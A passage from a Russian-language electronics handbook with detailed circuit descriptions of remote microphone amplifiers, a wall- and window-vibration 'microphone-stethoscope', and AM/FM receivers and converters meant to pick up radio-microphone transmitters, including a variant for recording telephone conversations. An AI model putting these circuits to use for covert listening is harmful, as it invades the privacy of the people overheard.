Настройка усилителя заключается в подборе сопротивления резистора R7. При этом необходимо контролировать напряжения, указанные на принципиальной схеме.

Для подключения выносного микрофона необходим экранированный кабель с двумя внутренними жилами.

Микрофонный усилитель с дифференциальным входом

Такой недостаток, как питание выносного микрофона по трем проводам, можно устранить. Ниже приведена схема с двухпроводной соединительной линией, имеющая лучшие выходные характеристики, чем выше описанная. За основу взята схема, представленная на рис. 2.41. В качестве предварительного усилителя используется дифференциальный операционный усилитель. Принципиальная схема устройства приведена на рис. 2.43.

Работа выносного микрофона (левая часть схемы) подробно изложена при описании работы схемы рис. 2.41. Остановимся на подробном описании правой части схемы. Основу правой части схемы представляет операционный усилитель DA1 типа КР1407УД2, включенный по схеме дифференциального усилителя. Он представляет собой малощумящпй операционный усилитель с малым током потребления. Схема имеет коэффициент ослабления синфазных входных напряжений около 100 дБ. Это свойство и используется для подавления помех, наводимых в проводах и имеющих синфазный характер. Полезный сигнал и помеха снимаются с нагрузочных резисторов R6 и R7 и через конденсаторы С3 и С4 поступают на инвертирующий и неинвертирующий входы микросхемы DA1 соответственно. Вследствие этого сигнал помехи ослабляется в микросхеме на 100 дБ. Полезный звуковой сигнал усиливается операционным усилителем в 10 раз. Коэффициент усиления сигнала можно изменять путем изменения сопротивления резисторов R8 и R9. Увеличение их номиналов приводит к увеличению коэффициента усиления, определяемого как отношение R8/R4 (R9/R5). Сигнал, усиленный микросхемой, с выхода 6 через конденсатор С6 поступает на основной УЗЧ или магнитофон.

Резисторы R10, R11 и конденсатор С5 создают искусственную среднюю точку, в которой напряжение равно половине напряжения источника питания. Это обусловлено тем, что для питания устройства используется однополярное питание, а для нормальной работы операционного усилителя необходимо двухполярное питание. Резистор R13 устанавливает необходимый ток потребления микросхемы. Микросхему DA1 можно заменить на КР140УД1208. Но возможно и применение любого другого операционного усилителя, включенного по типовой схеме со своими Цепями коррекции. Резистор R13 в этом случае из схемы исключается.

При исправных деталях устройство начинает работать без дополнительных регулировок. Увеличить (уменьшить) усиление можно подбором сопротивлений R8 и R9.

Если левую часть схемы заменить схемой, приведенной на рис. 2.44, а из правой части убрать резисторы R6 и R7, то можно записывать на магнитофон телефонный разговор при снятой телефонной трубке.

Микрофон-стетоскоп

Наряду с узконаправленнымн и проводными выносными микрофонами, существуют устройства, которые регистрируют вибрационные колебания стен, потолков, стекол, вентиляционных шахт и т. л. Эти устройства называются микрофоны-стетоскопы. Они представляют собой довольно сложные устройства. Поэтому ниже описано устройство, которое может служить прообразом микрофона-стетоскопа, и принцип его работы. Принципиальная схема устройства приводится на рис. 2.45.

Усилитель звуковой частоты собран на микросхеме DA1 типа К140УД6. Резисторы R1 и R2 задают режим работы микросхемы. Коэффициент усиления определяется значением сопротивления резистора R3. Транзисторы VT1 типа КТ315 и VT2 типа КТ361 включены по схеме эмиттерных повторителей и усиливают выходной сигнал по току. Нагрузкой усилителя служат головные телефоны ТЭМ-2.

Датчик вибрации делается из пьезокерамической головки В1, снятой со старого проигрывателя. Виброколебания преобразуются пьезадатчиком в электрические и усиливаются усилителем DA1. В качестве пьезодатчика В2 можно применить пьезоизлучатель типа ЗП-1, ЗП-22 и им подобные от электронных часов и игрушек. Они хорошо воспроизводят частоты в диапазоне 800-3000 Гц, что, в основном, перекрывает речевой диапазон частот.

При необходимости можно усилить сигнал до нужной величины, используя дополнительный усилитель звуковой частоты. Сигнал на него поступает с выхода операционного усилителя DA1. Подобный датчик может быть с успехом использован и в качестве датчика охранной сигнализации. В качестве пьезодатчика В1 можно использовать, например, ПЭ-1, ГЗП-308 и другие.

Рис. 2.34 Микрофон на малошумящих транзисторах

Изображение: 

Рис. 2.35 Микрофон для обнаружения слабых акустических сигналов на специализированной микросхеме

Изображение: 

Рис. 2.36 Избирательная система из направленных трубок

Изображение: 

Рис. 2.37 Микрофон в параболическом улавливателе

Изображение: 

Рис. 2.38 Избирательная резонансная система

Изображение: 

Рис. 2.39 Выносной микрофон с питанием от линии связи

Изображение: 

Рис. 2.40 Малогабаритный выносной микрофон с низким питающим напряжением

Изображение: 

Рис. 2.41 Выносной микрофон с усилителем

Изображение: 

Рис. 2.42 Выносной микрофон с питанием от трехпроводной симметричной линии связи

Изображение: 

Рис. 2.43 Выносной микрофон на операционном усилителе

Изображение: 

Рис. 2.44 Специализированный микрофон

Изображение: 

Рис. 2.45 Микрофон-стетоскоп

Изображение: 

2.4. Приемные устройства оповещения и сигнализации

2.4. Приемные устройства оповещения и сигнализации

Описанные выше устройства - радиопередатчики и радиоретрансляторы - не могут быть эффективно использованы без приемного устройства. Для того, чтобы их целенаправленно использовать, они должны работать совместно со специальным радиоприемным устройством. В этой главе приводятся принципиальные схемы и подробные описания некоторых радиоприемных устройств. Особое внимание при выборе схем было уделено таким техническим характеристикам устройств, как высокая чувствительность, простота изготовления, минимально возможное количество деталей, простая настройка и др. При этом радиоприемники разделены по ряду признаков или особенностей их использования и изготовления. Описание начинается с приемников диапазона 27-29 МГц, работающих с амплитудной и частотной модуляцией. Далее приведен раздел с описанием радиоприемных

устройств, работающих в диапазоне 65-108 МГц. Отдельно рассмотрены радиоприемные устройства более высокочастотного диапазона. Один из разделов данного параграфа включает в себя описание радиоприемных приставок и конвертеров на различные радиочастотные диапазоны.

Предлагаемые радиоприемные устройства могут быть использованы не только для работы с радиопередатчиками, но и в различных приемных трактах: трактах радиостанций, охранных сигнализаций и в системах дистанционного управления.

Печатные и монтажные платы устройств не приводятся по коммерческим соображениям, они изготавливаются самостоятельно, в зависимости от используемых деталей, габаритных размеров и так далее.

2.4.1. Радиоприемные устройства AM сигналов высокой чувствительности

2.4.1. Радиоприемные устройства AM сигналов высокой чувствительности

Данное радиоприемное устpойство позволяет принимать амплитудно-модулированные сигналы в диапазоне 27-29 МГц. Оно обладает высокой чувствительностью - не хуже 0,5 мкВ/м при соотношении сигнал/шум 3/1. Избирательность по соседнему каналу при расстройке на 9 кГц - не хуже 30 дБ. Ток потребления при средней громкости - около 30 мА. Принципиальная схема радиоприемника приведена на рис. 2.46.

С антенны сигнал поступает на входной контур L1, С2, выделяющий полосу частот принимаемого сигнала. Выделенный высокочастотный сигнал с отвода катушки L1 поступает на базу транзистора VT2, входящего в состав каскадного смесителя. На эмиттер этого же транзистора с отвода катушки L3 поступает сигнал гетеродина, который собран на транзисторе VT4. Частота сигнала гетеродина задается параметрами частотозадающего контура L3, С9. Перестройка гетеродина осуществляется конденсатором переменной емкости С9. Частота гетеродина должна отличаться от частоты принимаемого сигнала на величину промежуточной частоты, в данном случае - на 465 кГц.

Каскадный смеситель, собранный на транзисторах VT1 и VT2, выполнен по схеме ОЭ-ОБ. Благодаря этому смеситель имеет большое выходное сопротивление, что позволяет включить контур L2, С6, настроенный на промежуточную частоту, в коллекторную цепь транзистора VT1. Режимы работы транзисторов смесителя по постоянном токе определяются сопротивлением резисторов R1 и R2. С выхода смесителя сигнал промежуточной частоты цоступает на вход эмиттерного повторителя, собранного на транзисторе VT3. Он согласует высокое выходное сопротивление смесителя с низким входным сопротивлением пьезокерамического фильтра ZQ1. Фильтр ZQ1 определяет селективность по соседнему каналу. Он нагружен на согласованную нагрузку, функцию которой выполняет резистор R7. С этой нагрузки напряжение промежуточной частоты (ПЧ) поступает на вход двухкаскадного каскадного усилителя ПЧ, выполненного на транзисторах VT5-VT8. В каскадных усилителях используются схемы на транзисторах разной структуры с включением их по схеме OK - ОБ. Режим работы транзисторов определяется сопротивлением резисторов R8, R9, R11, R12.

Детектор приемника выполнен на диоде VD1, который нагружен на высокое входное сопротивление эмиттерного повторителя на транзисторе VT11. Постоянная составляющая базового напряжения этого транзистора смещает рабочую точку диода VD1 в прямом направлении и поддерживает ее в начале криволинейного участка вольт-амперной характеристики, что обеспечивает лучшее детектирование слабых сигналов, а следовательно и более высокую чувствительность, чем обычный детектор. С нагрузки эмиттерного повторителя VT11 продетектированный низкочастотный сигнал поступает на регулятор громкости, выполненный на резисторе R19, и далее на усилитель звуковой частоты .

Приемник имеет эффективную систему автоматической регулировки усиления (АРУ). Для работы системы АРУ используется напряжение ПЧ, снимаемое с коллектора транзистора VT7. Положительные волны этого напряжения поступают в цепь базы транзистора VT10, который при повышении уровня входного сигнала, а следовательно и сигнала ПЧ, открывается. Это приводит к закрытию транзистора VT9, в результате чего уменьшается напряжение на эмиттере этого транзистора, одновременно снижается и напряжение питания смесителя и первого каскада УПЧ, что приводит к уменьшению усиления этих каскадов. Цепь, состоящая из R17 и VD3, служит для создания на аноде VD2 положительного напряжения, смещающего рабочую точку транзистора VT1O в сторону наибольшей чувствительности, тем самым компенсируя затухание, вносимое резистором R15.

Усилитель звуковой частоты приемника выполнен по типовой схеме на транзисторах VT12-VT14 и особенностей не имеет. Нагрузкой усилителя служит малогабаритный громкоговоритель В1 с сопротивлением катушки не менее 8 Ом или головные телефоны.

В радиоприемнике используются резисторы типа МЛТ-0,125, электролитические конденсаторы типа К50-6, К50-16 или К50-35, подстроечные конденсаторы типа КПК, конденсатор С9 желательно использовать с воздушным диэлектриком, пьезокерамический фильтр ZQ1 типа ФП1П-061-08 или ФП1П-026 с частотой настройки 465 кГц. Для намотки катушек используются полистироловые каркасы с надстроечными сердечниками из феррита 100НН диаметром 2,8 мм и длиной 14 мм. Катушки L1 и L3 имеют по 20 витков провода ПЭВ 0,18 мм. Отвод у катушки L1 сделан от 7 витка, считая от заземленного вывода. У катушки L3 отвод сделан от 1 витка. Катушка контура ПЧ L2 наматывается на стандартном четырехсекционном каркасе и помещается в трубчатый ферритовый магнитопровод из феррита марки 400НН, сердечник - из того же материала. Катушка L2 содержит 120 витков провода ПЭВ 0,12 мм.

Настройку приемника следует начинать с усилителя звуковой частоты. Подбором сопротивления резистора R21 станавливается напряжения в точке соединения эмиттеров транзисторов VT13, VT14. Оно должно быть равным половине напряжения источника питания. Напряжение на электродах транзисторов каскадов ПЧ н АРУ устанавливается подбором сопротивлений резисторов в цепи базы при отсутствии входного сигнала и отключенном гетеродине. Необходимые значения напряжений в вольтах приведены в табл. 2.3.

Таблица 2.3. Значения напряжений на выводах транзисторов

 

vt1


vt2


vt3


vt5


vt6


vt7


vt8


vt9


vt10


vt11

Uk

3.5

1.5

 

3.5

 

3.5

   

5.5

 

   

2.5

 

1.0

 

1.0

5.5

 

2.3

 

Контур L2, C6 настраивается на частоту ПЧ - 465 кГц. Входной контур настраивается на середину принимаемого диапазона. Приемник можно использовать совместно с радиопередатчиками, имеющими кварцевую стабилизацию частоты. Для этого используют несколько фиксированных настроек. Это достигается изменением схемы гетеродина (рис. 2.47).

Вместо конденсатора переменной емкости С9 устанавливается подстроечный конденсатор. Кварцевый резонатор ZQ2 включается между коллектором и базой транзистора VT4. Частота кварца ZQ2 должна отличаться от частоты кварца передатчика на значение ПЧ, равное 465 кГц. При использовании нескольких кварцованных передатчиков в гетеродине приемника необходимо использовать соответствующее число кварцевых резонаторов, которые подключаются при помощи переключателя.

Радиоприемное устройство AM сигналов с фиксированной настройкой частоты

В отличие от предыдущего, предлагаемое устройство имеет более простое схемное решение. Приемник работает в диапазоне 27-29 МГц с амплитудной модуляцией. Чувствительность - около 4 мкВ/м. Селективность по соседнему каналу - 26 дБ. Приемник имеет фиксированную настройку на один или несколько каналов. Принципиальная схема радиоприемника приведена на рис. 2.48.

Принятый сигнал выделяется контуром L1, С2 и усиливается усилителем высокой частоты, выполненным на транзисторе VT1. На транзисторе VT2 выполнен преобразователь частоты с совмещенным гетеродином и кварцевой стабилизацией частоты гетеродина кварцем ZQ1. Усиленный сигнал с коллектора VT1 смешивается с сигналом гетеродина. В результате на коллекторе транзистора VT2 формируется сигнал промежуточной частоты. Сигнал ПЧ выделяется пьезокерамическим фильтром ZQ2 с частотой настройки 465 кГц и усиливается двухкаскадным усилителем промежуточной частоты, собранным на транзисторах VT3, VT4. Детектор приемника выполнен на диодах VD1, VD2. С детектора сигнал поступает на систему АРУ, состоящую из цепи R8, С8, R10, а также через регулятор громкости R13 на усилитель звуковой частоты, аналогичный приведенному на рис. 2.46.

Диоды VD1 , VD2 могут быть типа Д18,ГД507. Пьезокерамический фильтр ZQ2 может быть любой с частотой настройки 465 кГц. Дроссели Др1, Др2 намотаны на резисторах МЛТ-0,25 сопротивлением более 100 ком. Каждый имеет по 100 витков провода ПЭВ 0,1.

Конструкция катушки L1 аналогична предыдущему описанию, она содержит 13 витков провода ПЭВ 0,23 с отводом от 3 витка.

Настройку начинают с установки токов коллекторов транзисторов VT1-VT4. Ток коллектора VT1 (0,6 мА) устанавливается подбором сопротивления резистора К1. Токи коллекторов VT2-VT4 устанавливаются подбором сопротивлений резисторов RЗ, R7, R11, соответственно, равными 1, 0,5 и 0,05 мА.

Радиоприемное устройство AM сигналов на специальной микросхеме

Предлагаемое радиоприемное устройство по схемному решению намного проще рассмотренного выше. Это стало возможным благодаря использованию в приемнике специализированной микросхемы К174ХА10. Она включает в себя тракт ПЧ, детектор, УЗЧ. Чувствительность приемника при отношении сигнал/шум 12 дБ - около 1 мкВ/м. Селективность по соседнему каналу - 32 дБ (целиком зависит от параметров используемого пьезокерамического фильтра). Селективность по зеркальному каналу - 26 дБ. Мощность усилителя звуковой частоты -100 мВт на нагрузке сопротивлением 8 Ом. Приемник работает при питающих напряжениях от 4 до 9В. Принципиальная схема приведена на рис. 2.49.

Сигнал с антенны поступает на базу транзистора VT1, который выполняет роль резонансного усилителя высокой частоты. Контур L1, С3 определяет селективность приемника по зеркальному каналу. Усиленный сигнал поступает на вход преобразователя частоты, выполненного на транзисторе VT2 по схеме с совмещенным гетеродином, частота которого стабилизирована кварцем ZQ1. С нагрузки преобразователя, дросселя Др1, сигнал промежуточной частоты поступает на пьезокерамическпй фильтр ZQ2, который из набора частот выделяет промежуточную частоту 465 кГц.

Отфильтрованная ПЧ поступает на вход УПЧ микросхемы DA1. Выходной каскад УПЧ включен по нестандартной схеме, роль нагрузки УПЧ выполняет резистор R8. Это немного ухудшает качество детектировання, но позволяет отказаться от использования контуров ПЧ и их настройки. С выхода детектора напряжение звуковой частоты поступает на регулятор громкости R10 и с него на вход усилителя мощности данной микросхемы. С выхода УЗЧ сигнал через конденсатор С13 поступает в нагрузку - громкоговоритель или головные телефоны.

Транзисторы VT1, VT2 можно заменить на КТЗ42, КТЗ68. Все сопротивления в схеме типа МЛТ-0,125, резистор R10 - типа СП1. Катушка L1 намотана на ферритовом стержне диаметром 2,8 мм и длиной 14 мм и содержит 16 витков провода ПЭВ 0,23 мм с отводом от 11-го витка, считая снизу по схеме. Дроссель Др1 намотан на аналогичном стержне и содержит 150 витков провода ПЭВ 0,1 мм. Настройку начинают с установки коллекторных токов транзисторов VT1 и VT2 равными 0,7 мА и 2 мА, соответственно, путем подбора сопротивлений резисторов R1 и R3. Резистор R8 подбирают по минимуму искажений звукового сигнала при минимальном уровне шумов на выходе УЗЧ. Контур L1, СЗ настраивается на частоту высокочастотного сигнала.

Модернизировать данный приемник можно, применив еще одну специализированную микросхему - DА2 К174ПС1. Она выполняет функции смесителя и гетеродина и имеет больший коэффициент передачи. Высокочастотная часть схемы (рис. 2.49) заменяется на схему, представленную на рис. 2.50.

Обозначение деталей схемы продолжает рис. 2.49. Катушка L1 выполнена без отвода. Транзистор VT3 выполняет роль симметрирующего устройства.

2-46.gif

Изображение: 

2-47.gif

Изображение: 

2-48.gif

Изображение: 

2-49.gif

Изображение: 

2-50.gif

Изображение: 

2.4.2. Радиоприемные устройства ЧМ сигналов высокой чувствительности

2.4.2. Радиоприемные устройства ЧМ сигналов высокой чувствительности

Радиоприемное устройство предназначено для приема сигнала в диапазоне 27-29 МГц с использованием узкополосной частотной модуляции с девиацией частоты 2,5 KГц. Чувствительность такого приемника около 1 мкВ. Напряжение питания - 4-9 В. Избирательность по соседнему и зеркальному каналам не хуже 40 дБ и 23 дБ, соответственно. Принципиальная схема приемника приведена на рис. 2.51.

Приемник выполнен по супергетеродинной схеме на интегральной микросхеме К174ХА26, которая предназначена для работы в тракте ПЧ приемников с двойным преобразованием частоты. Для упрощения схемы в нашем случае используется только одно преобразование частоты.

Сигнал от антенны поступает на входной контур L1, С3, настроенный на частоту входного сигнала. Диоды VD1, VD2 служат для ограничения входного сигнала большой амплитуды, например, импульсных помех. Контур L1, С3 полностью подключен к затвору транзистора VT1 типа КПЗ50А. Этот транзистор выполняет роль резоансного усилителя высокой частоты. В его стоковую цепь включен контур L2, С4, также настроенный на частоту принимаемого сигнала. С катушки связи L3 усиленный сигнал поступает на вход смесителя - микросхему DA1. На второй затвор транзистора VT1 поступает напряжение, снимаемое с движка подстроечного резистора R1. Изменением напряжения на втором затворе транзистора изменяют коэффициент усиления резонансного усилителя на транзисторе VT1 и, как следствие, повышают чувствительность всего приемника в целом. Гетеродин приемника выполнен на элементах, входящих в состав микросхемы DA1, его частота определяется подключенным к выводу 1 кварцевым резонатором.

Частота кварцевого резонатора должна отличаться от частоты входного сигнала на 465 кГц (в меньшую или большую сторону). С выхода смесителя сигнал ПЧ через буферный каскад поступает на пьезокерамический фильтр ZQ2, который определяет селективность по соседнему каналу. С выхода фильтра ZQ2 сигнал поступает на усилитель-ограничитель ПЧ и частотный детектор, входящие в состав микросхемы DA1. Пятикаскадный УПЧ имеет коэффициент усиления по напряжению около 100. Дeтeктоp выполнен по схеме двойного балансного перемножителя. Для нормальной работы детектора необходим фазосдвигающий контур L4, С21. Резистор R14 шунтирует контур, расширяя тем самым его полосу пропускания. От него зависит чувствительность и уровень шумов на выходе устройства. Резистор R14 подбирается по оптимальному значению приведенных показателей. Продетектированный сигнал усиливается предварительным УЗЧ, который также находится в микросхеме DA1 , и поступает на регулятор громкости, выполненный на резисторе К12, а с движка этого переменного резистора - на вход УЗЧ, выполненного на микросхеме DA2 типа К174ХА10.

Приемник имеет систему бесшумной настройки, которая работает следующим образом. При отсутствии входного сигнала или значительном снижении его уровня на выводе 10 микросхемы ПА1 резко увеличивается уровень шумов, которые имеют максимальную спектральную плотность в диапазоне 7-10 кГц. Этот шум поступает на активный фильтр, собранный на операционном усилителе, входящем в состав микросхемы DA1. Усиленный сигнал шумов поступает на детектор, собранный на диоде VD3, где и преобразуется в уровень постоянного напряжения. Это напряжение поступает на вход триггера, входящего в состав микросхемы DA1, на выходе которого (вывод 16) , при отсутствии полезного сигнала, устанавливается нулевой уровень. Этот уровень шунтирует. регулятор громкости R13 и блокирует вход УЗЧ. Порог срабатывания системы бесшумной настройки устанавливается резистором R4.

В приемнике вместо микросхемы DA1 типа К174ХА26 можно использовать микросхему КФ1066ХА2. Эта микросхема по своему составу аналогична К174ХА26, но отличается расположением выводов.

Вместо микросхемы DА2 можно использовать К174УН14, К174УН7 или выполнить УЗЧ на дискретных элементах. Транзистор КП350 можно заменить на КПЗО6. Пьезокерамнческий фильтр ZQ2 - любой малогабаритный фильтр на 465 кГц. Катушки L1, L2, L3 намотаны на цилиндрических каркасах диаметром 5 мм с подстроечными сердечника из феррита марки 100НН, длиной 12 мм и диаметром 2,8 мм. Катушка L1 содержит 9 витков с отводом от третьего витка, L2 9 витков, L3 - 3 витка провода ПЭВ 0,3 мм. Катушка L3 наматывается поверх катушки L2. Катушка L4 наматывается на каркасе от контура ПЧ радиовещательного приемника и содержит 90 витков провода ПЭВ 0.12 мм.

Настройку приемника выполняют традиционным способом. Резистором R1 устанавливается максимальная чувствительность, а резистором R4 - порог срабатывания бесшумной настройки

Приемник УКВ диапазона с ЧМ

Приемник предназначен для приема станций, работающих в диапазоне 64-108 МГц с частотной модуляцией. Чувствительность приемника при соотношении сигнал/шум ЗОдБ - не хуже 70 мкВ/м. Избирательность по соседнему каналу - 18 дБ. Питается приемник от источника питания напряжением 9 В. Принципиальная схема приемника представлена на рис.2.52.

Сигнал с антенны через конденсатор С2 поступает на входной контур L1, С1, настроенный на середину диапазона. В процессе настройки на станцию этот контур не перестраивается. Выделенная этим контуром полоса частот поступает на преобразователь частот, выполненный на микросхеме DA1 типа К174ПС1. На этой же микросхеме выполнен и гетеродин приемника. Частота гетеродина определяется параметрами контура L2, С6, С8, С9, С10, VD1, С11. При настройке на станцию постоянное напряжение, снимаемое с движка надстроечного резистора R5, воздействует на катод варикапа VD1 и изменяет его емкость и, следовательно, частоту гетеродина.

Напряжение АПЧГ поступает с микросхемы DA2 на анод этого варикапа.

Напряжение ПЧ частотой 6,5 МГц выделяется на нагрузке преобразователя частоты резисторе R1 и через пьезокерамический фильтр ZQ1 поступает на вход микросхемы DA2 типа К174УР3. Последняя содержит УПЧ, усилитель-ограничитель, фазоинвертор и частотный детектор, предварительный УЗЧ с электронной регулировкой громкости.

В фазоинверторе детектора работает колебательный контур L3, С21 . На резисторе R7 выделяется напряжение АПЧГ, которое поступает на варикап VD1 через цепь R16, С16, R6. С детектора сигнал поступает на вход предварительного УЗЧ. Регулировка громкости осуществляется изменением сопротивления резистора R10. С выходаэтого усилителя сигнал НЧ поступает на усилитель мощности, выполненный на операционном усилителе - микросхеме DАЗ типа КР1407УД2 и двух транзисторах VT1, VT2, включенных по схеме эмиттерных повторителей.

Катушки приемника L1 и L2 бескаркасные, наматываются на оправке диаметром 3 мм. Катушка L1 содержит 7 витков с отводом от 1 витка, катушка L2 - 7 витков провода ПЭВ 0,4 мм. Катушка L3 намаывается на ферритовом сердечнике марки 400НН диаметром 2,8 мм и длиной 14 мм. Катушка L3 содержит 16 витков ПЭВ 0,3 мм, она должна с небольшим трением перемещаться по стержню. После настройки все катушки фиксируются эпоксидной смолой или герметиком. Фильтр ZQ1 - типа ФП1П86202 или любой другой на 6,5 МГц. Можно использовать и фильтры на 5,5 МГц или 10,7 МГц, но в этом случае необходимо будет изменить параметры контура L3, С21. Резистор R5 лучше взять подстроечный многооборотный. Микросхему DА3 можно заменить на КР140УД1208 или любой операционный усилитель, включенный по типовой схеме.

Настройка приемника особенностей не имеет.

При желании принимать сигнал от нескольких радиомикрофонов, разнесенных по частоте, необходимо немного доработать приемник, путем введения нескольких фиксированных настроек. Примерный вариант схемы фиксированных настроек показан на рис. 2.53.

Из схемы можно исключить конденсаторы С4, С5, заменив их катушкой связи L4 (рис. 2.54), намотанной между витками катушки L1.

Катушка L4 содержит 2 витка того же провода, что и катушка L1.

Схему приемника можно несколько упростить, использовав гибридную микросхему от канала звукового сопровождения современных цветных телевизоров типа УПЧЗ-1M или УПЧЗ-2. В составе этих блоков есть полный тракт ПЧ УКВ ЧМ приемника с промежуточной частотой 6,5 МГц. Изменение схемы представлено на рис. 2.55

Однако следует иметь в виду, что эта схема не имеет системы АПЧГ. Поэтому нужно принимать меры по экранировке платы, чтобы исключить влияние тела оператора на настройку приемника.

Приемник УКВ диапазона с ЧМ и низковольтным питанием

Приемник работает в диапазоне 64-108 МГц и имеет чувствительность не хуже 5 мкВ/м. Номинальное напряжение питания - 3 В. Весь высокочастотный тракт, включая ЧМ детектор, УВЧ и гетеродин, собран на одной специализированной микросхеме DA1 типа К174ХА34. Эта микросхема представляет собой УВЧ, смеситель, гетеродин, УПЧ, усилитель-ограничитель, ЧМ детектор, системы шумепонижения и сжатия девиации частоты, которая позволяет использовать низкую промежуточную частоту - 60-80 кГц. Принципиальная схема приемника приведена на рис. 2.56.

Сигнал с антенны поступает на УВЧ через конденсатор С1. Частоту настройки гетеродина определают элементы L1, С4, С5, VD1. Настройка на станции осуществляется резистором R1, изменяющим напряжение на варикапе VD1 типа КВ109.

В качестве ФПЧ используются активные RC-фильтры на операционных усилителях, внешними элементами которых являются конденсаторы С6, С8, С9, C11, С12 и С13. Сигнал звуковой частоты через конденсатор С16 поступает на регулятор громкости - резистор RЗ.

УЗЧ приемника может быть любым, в том числе и на микросхеме К174ХА10. Постоянные резисторы типа МЛТ-0,125. Катушка L1 - бескаркасная с внутренним диаметром 3 мм. Она имеет 7 витков провода ПЭВ 0,31.

Настройка заключается в укладке диапазона подстройкой конденсатора С4.

УКВ приемник с ЧМ на специализированной микросборке КХА 058

Этот приемник прост в настройке и в изготовлении, и может быть рекомендован для повторения широкому кругу читателей. Основу приемника составляет микросборка КХА058, которая содержит в своем составе гетеродин, смеситель, УПЧ, детектор. Приемник имеет чувствительность с антенного входа около 5 мкВ/м при соотношении сигнал/шум 26 дБ. Принципиальная схема приемника представлена на рис. 2.57.

Сигнал с антенны поступает на вход апериодического усилителя высокой частоты, выполненного на транзисторе VT1 тина КТ3107. Усиленный сигнал через конденсатор С3 поступает на вход микросборки DA1. В ней происходит усиление и демодуляция ЧМ сигнала принимаемой радиостанции. Частота гетеродина-определяется параметрами контура L1, VD1 и конденсатора, находящегося в микросборке. Перестройка в пределах диапазона производится изменением напряжения на варцкапе VD1, которое снимается с движка резистора R7. Напряжение на резистор R7 подается от внутреннего стабилизатора микросборки.

Выходное напряжение НЧ с выхода микросборки поступает на вход эмиттерного повторителя на транзисторе VT2 типа КТ315. С него сигнал подается на головные телефоны В2 или на вход УЗЧ с чувствительностью не хуже 50 мВ.

Транзистор VT1 можно заменить на КТ3128, КТЗ61. Транзистор VT2 - на КТ3102. Вместо варикапа VD1 можно использовать КВ109, КВ122, КВ123. Катушка L1 бескаркасная, намотана на оправке диаметром 3,5 мм. Катушка L1 содержит 7 витков провода ПЭВ 0,4 мм для диапазона 68-80 МГц или 3 витка - для диапазона 80-108 МГц.

Если предполагается использовать приемник для работы с одним радиомикрофоном, то можно применить фиксированную настройку. При этом можно исключить из схемы элементы VD1, R7, R8, а параллельно катушке L1 включить подстроечный конденсатор емкостью 430 пФ, который позволит перекрыть весь необходимый диапазон.

2-51.gif

Изображение: 

2-52.gif

Изображение: 

2-53.gif

Изображение: 

2-54.gif

Изображение: 

2-55.gif

Изображение: 

2-56.gif

Изображение: 

2-57.gif

Изображение: 

2.4.3. Конвертеры для работы с радиоприемниками вещательных диапазонов

2.4.3. Конвертеры для работы с радиоприемниками вещательных диапазонов

Как правило, у потребителя уже имеется приемник на радиовещательные диапазоны, и ему нет необходимости собирать и настраивать приемное устройство для работы с радиопередатчиками. Достаточно иметь приставку-конвертер, работающую с обычным приемником. Конвертеры несколько снижают чувствительность приемника, но в ряде случаев это не мешает получать качественный прием необходимого сигнала. Ниже приводятся схемы и описания конвертеров на транзисторах и микросхемах. Устройства рассчитаны для работы и определенных диапазонах частот. Однако все описанные устройства можно использовать и на других частотах. Для этого, как правило, нужно только изменить частоту гетеродина конвертера. Конструктивно они могут быть выполнены в отдельном корпусе и с автономным источником питания. Но можно и встраивать их непосредственно в корпус используемого приемника.

УКВ конвертер на двух полевых транзисторах

Принципиальная схема конвертера представлена на рис. 2.58.

Он тозволяет принимать сигналы с частотной модуляцией при помощи обычного УКВ ЧМ приемника. Входной сигнал с частотой 58-78 МГц выделяется входным контуром L1, С1, настроенным на середину этого диапазона, и поступает далее на затвор полевого транзистора VT1 типа КП303Г. На этом транзисторе выполнен преобразователь частоты. На исток транзистора VT1 через конденсатор С4 подается сигнал гетеродина, выполненного на полевом транзисторе VT2 типа КП303Г. Контур гетеродина L2, С6 настроен на частоту 30 МГц. В результате входгай сигнал преобразуется в сигнал частотой 88-108 МГц. Этот сигнал снимается со стока транзистора VT1 и через конденсатор С3 поступает на антенный вход промышленного приемника.

Транзисторы могут быть с другими буквенными индексами. Резисторы типа МЛ-0,125, конденсаторы - КМ, КД, КЛС, катушки L1, L2 намотаны на каркасах диаметром 4 мм и длиной 10мм с латунными подстроечными сердечниками длиной 5 мм. Катушка L1 содержит 5 витков с отводом от 1 витка, катушка L2 - 10 витков с отводом от 2 витка. Обе катушки намотаны проводом ПЭВ-2 0,4 мм.

Настройка конвертера заключается в настройке контура гетеродина на частоту 29-31 МГц. Входной контур настраивается на середину принимаемого диапазона. Конвертер можно использовать и для приема сигналов в диапазоне 88-108МГц на УКВ ЧМ радиовещательный приемник. Для этого нужно уменьшить емкость конденсатора С1 до 15 пФ.

УКВ конвертер на одном полевом транзисторе

Конвертер представляет собой модернизированный вариант предыдущей схемы. В данной схеме преобразователь частоты на полевом транзисторе заменен диодным смесителем. Это сделано с целью согласования низкого входного сопротивления приемника с выходным сопротивлением преобразователя на транзисторе. Диодный смеситель в этом случае имеет более высокий коэффициент передачи, а следовательно, увеличивается и чувствительность конвертера в целом. Принципиальная схема конвертера приведена на рис. 2.59.

Гетеродин конвертера выполнен на транзисторе VT1, его частота задается параметрами катушки L1 и конденсатора С1. Сигнал гетероина частотой около 30 МГц поступает на анод германиевого диода VD1 . На катод этого диода поступает принятый антенной сигнал. Одновременно на катоде диода присутствуют и сигналы продуктов преобразования-частот: Fс + Fп и Fс - Fп, которые выделяются входными цепями используемого приемника. Конвертер может работать без дополнительной настройки с приемником диапазона УКВ1 или УКВ2.

В качестве диода VD1 можно использовать практически любой маломощный диод, например, Д18, ГД507 и т. д. В качестве катушки L2 использован дроссель ДМ-0,1 с индуктивностью 10 мкГн. Катушка L1 намотана на каркасе диаметром 5 мм и длиной 10 мм, и содержит 10 витков провода ПЭВ-2 0,4 мм с отводом от 2 витка. Подстроечный сердечник - из меди или латуни длиной 5 мм.

Настройка производится аналогично рассмотренной выше схеме.

УКВ конвертер на специализированной микросхеме

Отсутствие элементов настройки существенно упрощает конструкцию преобразователя, так как настройка производятся самим прием ником. В конвертере используется микросхема К174ПС1, которая и же хорошую развязку между сигналом гетеродина и входным сигналом Следовательно, даже мощные входные сигналы незначительно расстра ивают гетеродин. Микросхема некритична к питающему напряжению, так как содержит встроенный стабилизатор напряжения. Принципиальная схема конвертера приведена на рис. 2.60.

